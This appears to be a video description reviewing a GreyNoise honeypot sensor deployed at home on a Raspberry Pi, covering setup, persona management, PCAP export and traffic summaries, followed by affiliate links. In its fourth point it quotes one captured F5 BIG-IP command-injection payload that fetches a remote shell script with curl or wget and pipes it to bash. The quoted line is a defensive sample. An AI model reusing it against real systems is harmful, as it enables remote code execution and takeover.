Deploying a Greynoise Sensor at Home
Howdy y'all,
In this video I show how to deploy a Greynoise Sensor, thoughts of it after using it for 1 week.
For Vulnerability Management teams, I can see this enriching current threat based prioritization by having honeypots spread across your network and seeing what's being targeted (and by who), and what is oppurtunistic.
1) Easy to deploy: Took a sacrificial raspberry pi, ran a 1-liner script to install their dependencies. Minor hiccup on persistence, reported and easy fix. Port forwarded internal IP, opened a couple ports.
2) Sensor Management: I only have 1 sensor deployed, however the script sits at the top of the management pane, can't miss it. 1 click, and was able to change the "Persona". What this sensor looks like on the internet. Currently running F5 BIG-IP
3) Access to files: You have access to the PCAP files, and when exporting it removes all RFC1918 traffic (which as an infrequent Wireshark user, is nice). It breaks it down by persona as well.
4) SIFT: This is the main selling point IMO. GN processes this traffic and provides a tl;dr on your sensor traffic, highlighting payloads. Example, had some IP try this "{"command":"run","utilCmdArgs":"-c id;(curl -s -L http://IP:65534/0dzFrRzQ.sh || wget -q -O - http://IP:65534/0dzFrRzQ.sh) | bash -s"}
5) Ties back to platform: All of this information DOES get fed back to other GN customers (my understanding at least), however comparing your sensors results vs whats seen by GNs greater sensor network, can easily pinpoint anomalous behaviors.
Moving forward, being able to deploy a honeynet would be S-tier intel. Currently, IR/VM teams get a glance at Initial Access intel on the MITRE ATT&CK framework, capturing persistence and phone home techniques.
Links:
Join my Discord: / discord
Camera Setup:
Camera:
Sony ZV1: https://amzn.to/3Os45eC
Rode Wireless GO II: https://amzn.to/3s6qCGm
Mics:
Blue Snowball: https://amzn.to/3sxE6qy
Blue Yeti: https://amzn.to/3nSrrKV
Mic Arm: https://amzn.to/35J2Lyz
Wardriving Setup:
Raspberry Pi 4: https://amzn.to/38NOa6F
USB GPS Dongle: https://amzn.to/2XGv1NI
Wireless NIC: https://amzn.to/3iiyOKP
Books:
Social Engineering: The Science of Human Hacking: https://amzn.to/3qqDzoo
Countdown to Zero Day: https://amzn.to/35HMpGs
Sandworm: https://amzn.to/35LWGBf
Open Source Intelligence Techniques: Resources for Searching and Analyzing Online Information: https://amzn.to/2NcJnnf
Watch video Deploying a Greynoise Sensor at Home online without registration, duration hours minute second in high quality. This video was added by user Cody Bernardy 30 April 2024, don't forget to share it with your friends and acquaintances, it has been viewed on our site 1,48 once and liked it 3 people.